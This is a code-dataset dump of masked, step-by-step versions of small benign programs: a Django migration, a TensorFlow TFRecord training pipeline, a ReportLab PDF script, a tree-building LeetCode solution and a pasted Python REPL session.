('driver', '0001_initial'),
]
operations = [
migrations.RemoveField(
model_name='driver',
name='address',
),
migrations.AddField(
model_name='driver',
name='city',
field=models.CharField(default='', max_length=255),
preserve_default=False,
),
migrations.AddField(
model_name='driver',
name='image',
field=models.ImageField(default='', upload_to='mechanic_img'),
preserve_default=False,
),
migrations.AddField(
model_name='driver',
name='location',
field=location_field.models.plain.PlainLocationField(default='', max_length=63),
preserve_default=False,
),
migrations.AlterField(
model_name='driver',
name='first_name',
field=models.CharField(max_length=150),
),
migrations.AlterField(
model_name='driver',
name='last_name',
field=models.CharField(max_length=150),
),
]
|
normal
|
{
"blob_id": "ea918bdf96572b38461dc1810bd0b8c16efd0f0d",
"index": 5786,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('driver', '0001_initial')]\n operations = [migrations.RemoveField(model_name='driver', name=\n 'address'), migrations.AddField(model_name='driver', name='city',\n field=models.CharField(default='', max_length=255),\n preserve_default=False), migrations.AddField(model_name='driver',\n name='image', field=models.ImageField(default='', upload_to=\n 'mechanic_img'), preserve_default=False), migrations.AddField(\n model_name='driver', name='location', field=location_field.models.\n plain.PlainLocationField(default='', max_length=63),\n preserve_default=False), migrations.AlterField(model_name='driver',\n name='first_name', field=models.CharField(max_length=150)),\n migrations.AlterField(model_name='driver', name='last_name', field=\n models.CharField(max_length=150))]\n",
"step-4": "from django.db import migrations, models\nimport location_field.models.plain\n\n\nclass Migration(migrations.Migration):\n dependencies = [('driver', '0001_initial')]\n operations = [migrations.RemoveField(model_name='driver', name=\n 'address'), migrations.AddField(model_name='driver', name='city',\n field=models.CharField(default='', max_length=255),\n preserve_default=False), migrations.AddField(model_name='driver',\n name='image', field=models.ImageField(default='', upload_to=\n 'mechanic_img'), preserve_default=False), migrations.AddField(\n model_name='driver', name='location', field=location_field.models.\n plain.PlainLocationField(default='', max_length=63),\n preserve_default=False), migrations.AlterField(model_name='driver',\n name='first_name', field=models.CharField(max_length=150)),\n migrations.AlterField(model_name='driver', name='last_name', field=\n models.CharField(max_length=150))]\n",
"step-5": "# Generated by Django 3.0.7 on 2020-07-05 07:34\n\nfrom django.db import migrations, models\nimport location_field.models.plain\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('driver', '0001_initial'),\n ]\n\n operations = [\n migrations.RemoveField(\n model_name='driver',\n name='address',\n ),\n migrations.AddField(\n model_name='driver',\n name='city',\n field=models.CharField(default='', max_length=255),\n preserve_default=False,\n ),\n migrations.AddField(\n model_name='driver',\n name='image',\n field=models.ImageField(default='', upload_to='mechanic_img'),\n preserve_default=False,\n ),\n migrations.AddField(\n model_name='driver',\n name='location',\n field=location_field.models.plain.PlainLocationField(default='', max_length=63),\n preserve_default=False,\n ),\n migrations.AlterField(\n model_name='driver',\n name='first_name',\n field=models.CharField(max_length=150),\n ),\n migrations.AlterField(\n model_name='driver',\n name='last_name',\n field=models.CharField(max_length=150),\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
decoded_image.set_shape([height, width, channels])
<|reserved_special_token_0|>
with tf.Session() as sess:
tf.initialize_all_variables().run()
coord = tf.train.Coordinator()
threads = tf.train.start_queue_runners(sess=sess, coord=coord)
for i in range(TRAINING_ROUNDS):
sess.run(train_step)
coord.request_stop()
coord.join(threads)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
files = tf.train.match_filenames_once(
'/home/shenxj/tf-work/datasets/file_pattern-*')
filename_queue = tf.train.string_input_producer(files, shuffle=False)
reader = tf.TFRecordReader()
_, serialized_example = reader.read(filename_queue)
features = tf.parse_single_example(serialized_example, features={'image':
tf.FixedLenFeature([], tf.string), 'label': tf.FixedLenFeature([], tf.
int64), 'height': tf.FixedLenFeature([], tf.int64), 'weigth': tf.
FixedLenFeature([], tf.int64), 'channels': tf.FixedLenFeature([], tf.
int64)})
image, label = features['image'], features['label']
height, width = features['height'], features['weigth']
channels = features['channels']
decoded_image = tf.decode_raw(image, tf.uint8)
decoded_image.set_shape([height, width, channels])
image_size = 299
distorted_image = p182.preprocess_for_train(decoded_image, image_size,
image_size, None)
min_after_dequeque = 10000
batch_size = 100
capacity = min_after_dequeque + 3 * batch_size
image_batch, label_batch = tf.train.shuffle_batch([distorted_image, label],
batch_size=batch_size, capacity=capacity, min_after_dequeue=
min_after_dequeque)
logit = inference(image_batch)
loss = calc_loss(logit, label_batch)
train_step = tf.train.GradientDescentOptimizer(learning_rate=learning_rate
).minimize(loss)
with tf.Session() as sess:
tf.initialize_all_variables().run()
coord = tf.train.Coordinator()
threads = tf.train.start_queue_runners(sess=sess, coord=coord)
for i in range(TRAINING_ROUNDS):
sess.run(train_step)
coord.request_stop()
coord.join(threads)
<|reserved_special_token_1|>
import tensorflow as tf
import p182
files = tf.train.match_filenames_once(
'/home/shenxj/tf-work/datasets/file_pattern-*')
filename_queue = tf.train.string_input_producer(files, shuffle=False)
reader = tf.TFRecordReader()
_, serialized_example = reader.read(filename_queue)
features = tf.parse_single_example(serialized_example, features={'image':
tf.FixedLenFeature([], tf.string), 'label': tf.FixedLenFeature([], tf.
int64), 'height': tf.FixedLenFeature([], tf.int64), 'weigth': tf.
FixedLenFeature([], tf.int64), 'channels': tf.FixedLenFeature([], tf.
int64)})
image, label = features['image'], features['label']
height, width = features['height'], features['weigth']
channels = features['channels']
decoded_image = tf.decode_raw(image, tf.uint8)
decoded_image.set_shape([height, width, channels])
image_size = 299
distorted_image = p182.preprocess_for_train(decoded_image, image_size,
image_size, None)
min_after_dequeque = 10000
batch_size = 100
capacity = min_after_dequeque + 3 * batch_size
image_batch, label_batch = tf.train.shuffle_batch([distorted_image, label],
batch_size=batch_size, capacity=capacity, min_after_dequeue=
min_after_dequeque)
logit = inference(image_batch)
loss = calc_loss(logit, label_batch)
train_step = tf.train.GradientDescentOptimizer(learning_rate=learning_rate
).minimize(loss)
with tf.Session() as sess:
tf.initialize_all_variables().run()
coord = tf.train.Coordinator()
threads = tf.train.start_queue_runners(sess=sess, coord=coord)
for i in range(TRAINING_ROUNDS):
sess.run(train_step)
coord.request_stop()
coord.join(threads)
<|reserved_special_token_1|>
# encoding:utf-8
import tensorflow as tf
import p182.py as p182
# 创建文件列表,并通过文件列表创建输入文件队列。在调用输入数据处理流程前,需要
# 统一所有原始数据的格式并将它们存储到TFRcord文件中。下面给出的文件列表应该包含所
# 有提供训练数据的TFRcord文件
files = tf.train.match_filenames_once("/home/shenxj/tf-work/datasets/file_pattern-*")
filename_queue = tf.train.string_input_producer(files, shuffle=False)
# 使用类似7.1节中结婚嫂的方法解析TFRecord文件里的数据。这里假设image中存储的是图像
# 的原始数据,label为该样例所对应的标签。height,width和channels给出了图像的维度。
reader = tf.TFRecordReader()
_, serialized_example = reader.read(filename_queue)
features = tf.parse_single_example(
serialized_example,
features={
'image': tf.FixedLenFeature([], tf.string),
'label': tf.FixedLenFeature([], tf.int64),
'height': tf.FixedLenFeature([], tf.int64),
'weigth': tf.FixedLenFeature([], tf.int64),
'channels': tf.FixedLenFeature([], tf.int64),
}
)
image, label = features['image'], features['label']
height, width = features['height'], features['wigth']
channels = features['channels']
# 从原始图像数据解析出像素矩阵,并根据图像尺寸还原图像
decoded_image = tf.decode_raw(image, tf.uint8)
decoded_image.set_shape([height, width, channels])
# 定义神经网络输入层图片的大小。
image_size = 299
# preprocess_for_train为7.2.2小节中介绍的图像预处理程序
distorted_image = p182.preprocess_for_train(
decoded_image, image_size, image_size, None
)
# 将处理后的图像和标签数据通过tf.train.shuffle_batch整理成神经网络训练时
# 需要的batch
min_after_dequeque = 10000
batch_size = 100
capacity = min_after_dequeque + 3 * batch_size
image_batch, label_batch = tf.train.shuffle_batch(
[distorted_image, label], batch_size=batch_size,
capacity=capacity, min_after_dequeue=min_after_dequeque
)
# 定义神经网络的结构以及优化过程。image_batch可以作为输入提供给神经网络的输入层。
# label_batch则提供了输入batch中样例的正确答案
logit = inference(image_batch)
loss = calc_loss(logit, label_batch)
train_step = tf.train.GradientDescentOptimizer(learning_rate=learning_rate).minimize(loss)
# 声明会话并运行神经网络的优化过程
with tf.Session() as sess:
# 神经网络训练准备工作。这些工作包括变量初始化、线程启动
tf.initialize_all_variables().run()
coord = tf.train.Coordinator()
threads = tf.train.start_queue_runners(sess=sess, coord=coord)
# 神经网络训练过程
for i in range(TRAINING_ROUNDS):
sess.run(train_step)
# 停止所有线程
coord.request_stop()
coord.join(threads)
|
flexible
|
{
"blob_id": "1685a2c49bea14e6fcaffb03634f6875f8fa1049",
"index": 3726,
"step-1": "<mask token>\n",
"step-2": "<mask token>\ndecoded_image.set_shape([height, width, channels])\n<mask token>\nwith tf.Session() as sess:\n tf.initialize_all_variables().run()\n coord = tf.train.Coordinator()\n threads = tf.train.start_queue_runners(sess=sess, coord=coord)\n for i in range(TRAINING_ROUNDS):\n sess.run(train_step)\n coord.request_stop()\n coord.join(threads)\n",
"step-3": "<mask token>\nfiles = tf.train.match_filenames_once(\n '/home/shenxj/tf-work/datasets/file_pattern-*')\nfilename_queue = tf.train.string_input_producer(files, shuffle=False)\nreader = tf.TFRecordReader()\n_, serialized_example = reader.read(filename_queue)\nfeatures = tf.parse_single_example(serialized_example, features={'image':\n tf.FixedLenFeature([], tf.string), 'label': tf.FixedLenFeature([], tf.\n int64), 'height': tf.FixedLenFeature([], tf.int64), 'weigth': tf.\n FixedLenFeature([], tf.int64), 'channels': tf.FixedLenFeature([], tf.\n int64)})\nimage, label = features['image'], features['label']\nheight, width = features['height'], features['wigth']\nchannels = features['channels']\ndecoded_image = tf.decode_raw(image, tf.uint8)\ndecoded_image.set_shape([height, width, channels])\nimage_size = 299\ndistorted_image = p182.preprocess_for_train(decoded_image, image_size,\n image_size, None)\nmin_after_dequeque = 10000\nbatch_size = 100\ncapacity = min_after_dequeque + 3 * batch_size\nimage_batch, label_batch = tf.train.shuffle_batch([distorted_image, label],\n batch_size=batch_size, capacity=capacity, min_after_dequeue=\n min_after_dequeque)\nlogit = inference(image_batch)\nloss = calc_loss(logit, label_batch)\ntrain_step = tf.train.GradientDescentOptimizer(learning_rate=learning_rate\n ).minimize(loss)\nwith tf.Session() as sess:\n tf.initialize_all_variables().run()\n coord = tf.train.Coordinator()\n threads = tf.train.start_queue_runners(sess=sess, coord=coord)\n for i in range(TRAINING_ROUNDS):\n sess.run(train_step)\n coord.request_stop()\n coord.join(threads)\n",
"step-4": "import tensorflow as tf\nimport p182.py as p182\nfiles = tf.train.match_filenames_once(\n '/home/shenxj/tf-work/datasets/file_pattern-*')\nfilename_queue = tf.train.string_input_producer(files, shuffle=False)\nreader = tf.TFRecordReader()\n_, serialized_example = reader.read(filename_queue)\nfeatures = tf.parse_single_example(serialized_example, features={'image':\n tf.FixedLenFeature([], tf.string), 'label': tf.FixedLenFeature([], tf.\n int64), 'height': tf.FixedLenFeature([], tf.int64), 'weigth': tf.\n FixedLenFeature([], tf.int64), 'channels': tf.FixedLenFeature([], tf.\n int64)})\nimage, label = features['image'], features['label']\nheight, width = features['height'], features['wigth']\nchannels = features['channels']\ndecoded_image = tf.decode_raw(image, tf.uint8)\ndecoded_image.set_shape([height, width, channels])\nimage_size = 299\ndistorted_image = p182.preprocess_for_train(decoded_image, image_size,\n image_size, None)\nmin_after_dequeque = 10000\nbatch_size = 100\ncapacity = min_after_dequeque + 3 * batch_size\nimage_batch, label_batch = tf.train.shuffle_batch([distorted_image, label],\n batch_size=batch_size, capacity=capacity, min_after_dequeue=\n min_after_dequeque)\nlogit = inference(image_batch)\nloss = calc_loss(logit, label_batch)\ntrain_step = tf.train.GradientDescentOptimizer(learning_rate=learning_rate\n ).minimize(loss)\nwith tf.Session() as sess:\n tf.initialize_all_variables().run()\n coord = tf.train.Coordinator()\n threads = tf.train.start_queue_runners(sess=sess, coord=coord)\n for i in range(TRAINING_ROUNDS):\n sess.run(train_step)\n coord.request_stop()\n coord.join(threads)\n",
"step-5": "# encoding:utf-8\nimport tensorflow as tf\nimport p182.py as p182\n# 创建文件列表,并通过文件列表创建输入文件队列。在调用输入数据处理流程前,需要\n# 统一所有原始数据的格式并将它们存储到TFRcord文件中。下面给出的文件列表应该包含所\n# 有提供训练数据的TFRcord文件\nfiles = tf.train.match_filenames_once(\"/home/shenxj/tf-work/datasets/file_pattern-*\")\nfilename_queue = tf.train.string_input_producer(files, shuffle=False)\n\n# 使用类似7.1节中结婚嫂的方法解析TFRecord文件里的数据。这里假设image中存储的是图像\n# 的原始数据,label为该样例所对应的标签。height,width和channels给出了图像的维度。\nreader = tf.TFRecordReader()\n_, serialized_example = reader.read(filename_queue)\nfeatures = tf.parse_single_example(\n serialized_example,\n features={\n 'image': tf.FixedLenFeature([], tf.string),\n 'label': tf.FixedLenFeature([], tf.int64),\n 'height': tf.FixedLenFeature([], tf.int64),\n 'weigth': tf.FixedLenFeature([], tf.int64),\n 'channels': tf.FixedLenFeature([], tf.int64),\n }\n)\nimage, label = features['image'], features['label']\nheight, width = features['height'], features['wigth']\nchannels = features['channels']\n\n# 从原始图像数据解析出像素矩阵,并根据图像尺寸还原图像\ndecoded_image = tf.decode_raw(image, tf.uint8)\ndecoded_image.set_shape([height, width, channels])\n# 定义神经网络输入层图片的大小。\nimage_size = 299\n# preprocess_for_train为7.2.2小节中介绍的图像预处理程序\ndistorted_image = p182.preprocess_for_train(\n decoded_image, image_size, image_size, None\n)\n\n# 将处理后的图像和标签数据通过tf.train.shuffle_batch整理成神经网络训练时\n# 需要的batch\nmin_after_dequeque = 10000\nbatch_size = 100\ncapacity = min_after_dequeque + 3 * batch_size\nimage_batch, label_batch = tf.train.shuffle_batch(\n [distorted_image, label], batch_size=batch_size,\n capacity=capacity, min_after_dequeue=min_after_dequeque\n)\n\n# 定义神经网络的结构以及优化过程。image_batch可以作为输入提供给神经网络的输入层。\n# label_batch则提供了输入batch中样例的正确答案\nlogit = inference(image_batch)\nloss = calc_loss(logit, label_batch)\ntrain_step = tf.train.GradientDescentOptimizer(learning_rate=learning_rate).minimize(loss)\n\n# 声明会话并运行神经网络的优化过程\nwith tf.Session() as sess:\n # 神经网络训练准备工作。这些工作包括变量初始化、线程启动\n tf.initialize_all_variables().run()\n coord = tf.train.Coordinator()\n threads = tf.train.start_queue_runners(sess=sess, coord=coord)\n\n # 神经网络训练过程\n for i in range(TRAINING_ROUNDS):\n sess.run(train_step)\n\n # 停止所有线程\n coord.request_stop()\n coord.join(threads)\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
c.translate(inch, inch)
c.setFont('Helvetica', 80)
c.setStrokeColorRGB(0.2, 0.5, 0.3)
c.setFillColorRGB(1, 0, 1)
c.rect(inch, inch, 6 * inch, 9 * inch, fill=1)
c.rotate(90)
c.setFillColorRGB(0, 0, 0.77)
c.drawString(6 * inch, -6 * inch, 'welcome my project pharmacie')
c.showPage()
c.save()
<|reserved_special_token_1|>
__version__ = '3.3.0'
__doc__ = """
The Canvas object is the primary interface for creating PDF files. See
doc/reportlab-userguide.pdf for copious examples.
"""
__all__ = ['Canvas']
ENABLE_TRACKING = 1
<|reserved_special_token_0|>
c = canvas.Canvas('essai.pdf')
<|reserved_special_token_0|>
c.translate(inch, inch)
c.setFont('Helvetica', 80)
c.setStrokeColorRGB(0.2, 0.5, 0.3)
c.setFillColorRGB(1, 0, 1)
c.rect(inch, inch, 6 * inch, 9 * inch, fill=1)
c.rotate(90)
c.setFillColorRGB(0, 0, 0.77)
c.drawString(6 * inch, -6 * inch, 'welcome my project pharmacie')
c.showPage()
c.save()
<|reserved_special_token_1|>
__version__ = '3.3.0'
__doc__ = """
The Canvas object is the primary interface for creating PDF files. See
doc/reportlab-userguide.pdf for copious examples.
"""
__all__ = ['Canvas']
ENABLE_TRACKING = 1
import os
import sys
import re
import hashlib
from string import digits
import tempfile
from math import sin, cos, tan, pi, ceil
from reportlab import rl_config, ascii, xrange
from reportlab.pdfbase import pdfutils
from reportlab.pdfbase import pdfdoc
from reportlab.pdfbase import pdfmetrics
from reportlab.pdfgen import pdfgeom, pathobject
from reportlab.pdfgen.textobject import PDFTextObject, _PDFColorSetter
from reportlab.lib.colors import black, _chooseEnforceColorSpace, Color, CMYKColor, toColor
from reportlab.lib.utils import import_zlib, ImageReader, isSeq, isStr, isUnicode, _digester
from reportlab.lib.rl_accel import fp_str, escapePDF
from reportlab.lib.boxstuff import aspectRatioFix
from reportlab.pdfgen import canvas
c = canvas.Canvas('essai.pdf')
from reportlab.lib.units import inch
c.translate(inch, inch)
c.setFont('Helvetica', 80)
c.setStrokeColorRGB(0.2, 0.5, 0.3)
c.setFillColorRGB(1, 0, 1)
c.rect(inch, inch, 6 * inch, 9 * inch, fill=1)
c.rotate(90)
c.setFillColorRGB(0, 0, 0.77)
c.drawString(6 * inch, -6 * inch, 'welcome my project pharmacie')
c.showPage()
c.save()
<|reserved_special_token_1|>
#Copyright ReportLab Europe Ltd. 2000-2017
#see license.txt for license details
__version__='3.3.0'
__doc__="""
The Canvas object is the primary interface for creating PDF files. See
doc/reportlab-userguide.pdf for copious examples.
"""
__all__ = ['Canvas']
ENABLE_TRACKING = 1 # turn this off to do profile testing w/o tracking
import os
import sys
import re
import hashlib
from string import digits
import tempfile
from math import sin, cos, tan, pi, ceil
from reportlab import rl_config, ascii, xrange
from reportlab.pdfbase import pdfutils
from reportlab.pdfbase import pdfdoc
from reportlab.pdfbase import pdfmetrics
from reportlab.pdfgen import pdfgeom, pathobject
from reportlab.pdfgen.textobject import PDFTextObject, _PDFColorSetter
from reportlab.lib.colors import black, _chooseEnforceColorSpace, Color, CMYKColor, toColor
from reportlab.lib.utils import import_zlib, ImageReader, isSeq, isStr, isUnicode, _digester
from reportlab.lib.rl_accel import fp_str, escapePDF
from reportlab.lib.boxstuff import aspectRatioFix
from reportlab.pdfgen import canvas
c = canvas.Canvas("essai.pdf")
from reportlab.lib.units import inch
# move the origin up and to the left
c.translate(inch, inch)
# define a large font
c.setFont("Helvetica", 80)
# choose some colors
c.setStrokeColorRGB(0.2, 0.5, 0.3)
c.setFillColorRGB(1, 0, 1)
# draw a rectangle
c.rect(inch, inch, 6 * inch, 9 * inch, fill=1)
# make text go straight up
c.rotate(90)
# change color
c.setFillColorRGB(0, 0, 0.77)
# say hello (note after rotate the y coord needs to be negative!)
c.drawString(6 * inch, -6 * inch, "welcome my project pharmacie")
c.showPage()
c.save()
|
flexible
|
{
"blob_id": "7d6e8e6142184a1540daa29dac802fe75bd93d8e",
"index": 4428,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nc.translate(inch, inch)\nc.setFont('Helvetica', 80)\nc.setStrokeColorRGB(0.2, 0.5, 0.3)\nc.setFillColorRGB(1, 0, 1)\nc.rect(inch, inch, 6 * inch, 9 * inch, fill=1)\nc.rotate(90)\nc.setFillColorRGB(0, 0, 0.77)\nc.drawString(6 * inch, -6 * inch, 'welcome my project pharmacie')\nc.showPage()\nc.save()\n",
"step-3": "__version__ = '3.3.0'\n__doc__ = \"\"\"\nThe Canvas object is the primary interface for creating PDF files. See\ndoc/reportlab-userguide.pdf for copious examples.\n\"\"\"\n__all__ = ['Canvas']\nENABLE_TRACKING = 1\n<mask token>\nc = canvas.Canvas('essai.pdf')\n<mask token>\nc.translate(inch, inch)\nc.setFont('Helvetica', 80)\nc.setStrokeColorRGB(0.2, 0.5, 0.3)\nc.setFillColorRGB(1, 0, 1)\nc.rect(inch, inch, 6 * inch, 9 * inch, fill=1)\nc.rotate(90)\nc.setFillColorRGB(0, 0, 0.77)\nc.drawString(6 * inch, -6 * inch, 'welcome my project pharmacie')\nc.showPage()\nc.save()\n",
"step-4": "__version__ = '3.3.0'\n__doc__ = \"\"\"\nThe Canvas object is the primary interface for creating PDF files. See\ndoc/reportlab-userguide.pdf for copious examples.\n\"\"\"\n__all__ = ['Canvas']\nENABLE_TRACKING = 1\nimport os\nimport sys\nimport re\nimport hashlib\nfrom string import digits\nimport tempfile\nfrom math import sin, cos, tan, pi, ceil\nfrom reportlab import rl_config, ascii, xrange\nfrom reportlab.pdfbase import pdfutils\nfrom reportlab.pdfbase import pdfdoc\nfrom reportlab.pdfbase import pdfmetrics\nfrom reportlab.pdfgen import pdfgeom, pathobject\nfrom reportlab.pdfgen.textobject import PDFTextObject, _PDFColorSetter\nfrom reportlab.lib.colors import black, _chooseEnforceColorSpace, Color, CMYKColor, toColor\nfrom reportlab.lib.utils import import_zlib, ImageReader, isSeq, isStr, isUnicode, _digester\nfrom reportlab.lib.rl_accel import fp_str, escapePDF\nfrom reportlab.lib.boxstuff import aspectRatioFix\nfrom reportlab.pdfgen import canvas\nc = canvas.Canvas('essai.pdf')\nfrom reportlab.lib.units import inch\nc.translate(inch, inch)\nc.setFont('Helvetica', 80)\nc.setStrokeColorRGB(0.2, 0.5, 0.3)\nc.setFillColorRGB(1, 0, 1)\nc.rect(inch, inch, 6 * inch, 9 * inch, fill=1)\nc.rotate(90)\nc.setFillColorRGB(0, 0, 0.77)\nc.drawString(6 * inch, -6 * inch, 'welcome my project pharmacie')\nc.showPage()\nc.save()\n",
"step-5": "\n#Copyright ReportLab Europe Ltd. 2000-2017\n#see license.txt for license details\n__version__='3.3.0'\n__doc__=\"\"\"\nThe Canvas object is the primary interface for creating PDF files. See\ndoc/reportlab-userguide.pdf for copious examples.\n\"\"\"\n\n__all__ = ['Canvas']\nENABLE_TRACKING = 1 # turn this off to do profile testing w/o tracking\n\nimport os\nimport sys\nimport re\nimport hashlib\nfrom string import digits\nimport tempfile\nfrom math import sin, cos, tan, pi, ceil\nfrom reportlab import rl_config, ascii, xrange\nfrom reportlab.pdfbase import pdfutils\nfrom reportlab.pdfbase import pdfdoc\nfrom reportlab.pdfbase import pdfmetrics\nfrom reportlab.pdfgen import pdfgeom, pathobject\nfrom reportlab.pdfgen.textobject import PDFTextObject, _PDFColorSetter\nfrom reportlab.lib.colors import black, _chooseEnforceColorSpace, Color, CMYKColor, toColor\nfrom reportlab.lib.utils import import_zlib, ImageReader, isSeq, isStr, isUnicode, _digester\nfrom reportlab.lib.rl_accel import fp_str, escapePDF\nfrom reportlab.lib.boxstuff import aspectRatioFix\n\nfrom reportlab.pdfgen import canvas\n\nc = canvas.Canvas(\"essai.pdf\")\nfrom reportlab.lib.units import inch\n\n# move the origin up and to the left\nc.translate(inch, inch)\n# define a large font\nc.setFont(\"Helvetica\", 80)\n# choose some colors\nc.setStrokeColorRGB(0.2, 0.5, 0.3)\nc.setFillColorRGB(1, 0, 1)\n# draw a rectangle\nc.rect(inch, inch, 6 * inch, 9 * inch, fill=1)\n# make text go straight up\nc.rotate(90)\n# change color\nc.setFillColorRGB(0, 0, 0.77)\n# say hello (note after rotate the y coord needs to be negative!)\nc.drawString(6 * inch, -6 * inch, \"welcome my project pharmacie\")\nc.showPage()\nc.save()",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Solution(object):
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Solution(object):
def buildTree(self, inorder, postorder):
"""
:type inorder: List[int]
:type postorder: List[int]
:rtype: TreeNode
"""
hashmap = {}
for i, val in enumerate(inorder):
hashmap[val] = i
global post_index
post_index = len(inorder) - 1
def helper(left_index, right_index):
if left_index >= right_index:
return None
global post_index
root_val = postorder[post_index]
root = TreeNode(root_val)
post_index -= 1
index = hashmap[root_val]
root.right = helper(index + 1, right_index)
root.left = helper(left_index, index)
return root
return helper(0, len(inorder))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
global post_index
class Solution(object):
def buildTree(self, inorder, postorder):
"""
:type inorder: List[int]
:type postorder: List[int]
:rtype: TreeNode
"""
hashmap = {}
for i, val in enumerate(inorder):
hashmap[val] = i
global post_index
post_index = len(inorder) - 1
def helper(left_index, right_index):
if left_index >= right_index:
return None
global post_index
root_val = postorder[post_index]
root = TreeNode(root_val)
post_index -= 1
index = hashmap[root_val]
root.right = helper(index + 1, right_index)
root.left = helper(left_index, index)
return root
return helper(0, len(inorder))
<|reserved_special_token_1|>
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
Copyright 2020, Yutong Xie, UIUC.
Using recursion to construct binary tree from postorder and inorder traversal
'''
# Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
global post_index
class Solution(object):
def buildTree(self, inorder, postorder):
"""
:type inorder: List[int]
:type postorder: List[int]
:rtype: TreeNode
"""
hashmap = {}
for i, val in enumerate(inorder):
hashmap[val] = i
global post_index
post_index = len(inorder)-1
def helper(left_index, right_index):
if left_index >= right_index:
return None
global post_index
root_val = postorder[post_index]
root = TreeNode(root_val)
post_index -= 1
index = hashmap[root_val]
root.right = helper(index+1, right_index)
root.left = helper(left_index, index)
return root
return helper(0, len(inorder))
|
flexible
|
{
"blob_id": "b59dfd97a2b52ddef4e37557ea96bff9edf34989",
"index": 1342,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Solution(object):\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Solution(object):\n\n def buildTree(self, inorder, postorder):\n \"\"\"\n :type inorder: List[int]\n :type postorder: List[int]\n :rtype: TreeNode\n \"\"\"\n hashmap = {}\n for i, val in enumerate(inorder):\n hashmap[val] = i\n global post_index\n post_index = len(inorder) - 1\n\n def helper(left_index, right_index):\n if left_index >= right_index:\n return None\n global post_index\n root_val = postorder[post_index]\n root = TreeNode(root_val)\n post_index -= 1\n index = hashmap[root_val]\n root.right = helper(index + 1, right_index)\n root.left = helper(left_index, index)\n return root\n return helper(0, len(inorder))\n",
"step-4": "<mask token>\nglobal post_index\n\n\nclass Solution(object):\n\n def buildTree(self, inorder, postorder):\n \"\"\"\n :type inorder: List[int]\n :type postorder: List[int]\n :rtype: TreeNode\n \"\"\"\n hashmap = {}\n for i, val in enumerate(inorder):\n hashmap[val] = i\n global post_index\n post_index = len(inorder) - 1\n\n def helper(left_index, right_index):\n if left_index >= right_index:\n return None\n global post_index\n root_val = postorder[post_index]\n root = TreeNode(root_val)\n post_index -= 1\n index = hashmap[root_val]\n root.right = helper(index + 1, right_index)\n root.left = helper(left_index, index)\n return root\n return helper(0, len(inorder))\n",
"step-5": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n'''\n Copyright 2020, Yutong Xie, UIUC.\n Using recursion to construct binary tree from postorder and inorder traversal\n '''\n\n# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nglobal post_index\n\nclass Solution(object):\n def buildTree(self, inorder, postorder):\n \"\"\"\n :type inorder: List[int]\n :type postorder: List[int]\n :rtype: TreeNode\n \"\"\"\n hashmap = {}\n for i, val in enumerate(inorder):\n hashmap[val] = i\n\n global post_index\n post_index = len(inorder)-1\n\n def helper(left_index, right_index):\n if left_index >= right_index:\n return None\n\n global post_index\n\n root_val = postorder[post_index]\n root = TreeNode(root_val)\n\n post_index -= 1\n\n index = hashmap[root_val]\n\n root.right = helper(index+1, right_index)\n root.left = helper(left_index, index)\n\n return root\n\n return helper(0, len(inorder))\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# -*- coding: utf-8 -*-
"""
Created on Mon Apr 16 21:26:03 2018
@author: Brandon
"""os.getcwd()
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
NameError: name 'os' is not definimport os
>>> os.getcwd()
'C:\\Users\\Brandon\\AppData\\Local\\Programs\\Python\\Python36-32'
>>> os.chdir()
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
TypeError: Required argument 'path' (pos 1) not found
>>> os.chdir()
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
TypeError: Required argument 'path' (pos 1) not found
>>>
>>> os.chdir("C:\\Users\\Brandon\Documents")
>>> os.getcwd()
'C:\\Users\\Brandon\\Documents'
>>> os.makedirs()
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
TypeError: makedirs() missing 1 required positional argument: 'name'
>>> os.makedirs("yu")
>>> os.chdir("\\yu")
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
FileNotFoundError: [WinError 2] The system cannot find the file specified: '\\yu'
>>> os.chdir(".\\yu")
>>> os.getcwd()
'C:\\Users\\Brandon\\Documents\\yu'
>>> os.path.getsize(yu)
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
NameError: name 'yu' is not defined
>>> os.path.getsize()
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
TypeError: getsize() missing 1 required positional argument: 'filename'
>>> os.path.getsize()
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
TypeError: getsize() missing 1 required positional argument: 'filename'
>>> os.path.exists()
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
TypeError: exists() missing 1 required positional argument: 'path'
>>> os.path.exits("C:\\Users\\Brandon\\Documents\\yu")
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
AttributeError: module 'ntpath' has no attribute 'exits'
>>> os.path.exists("C:\\Users\\Brandon\\Documents\\yu")
True
>>>
|
normal
|
{
"blob_id": "dc97703d39e7db29e0ba333c2797f4be6d015fd7",
"index": 7886,
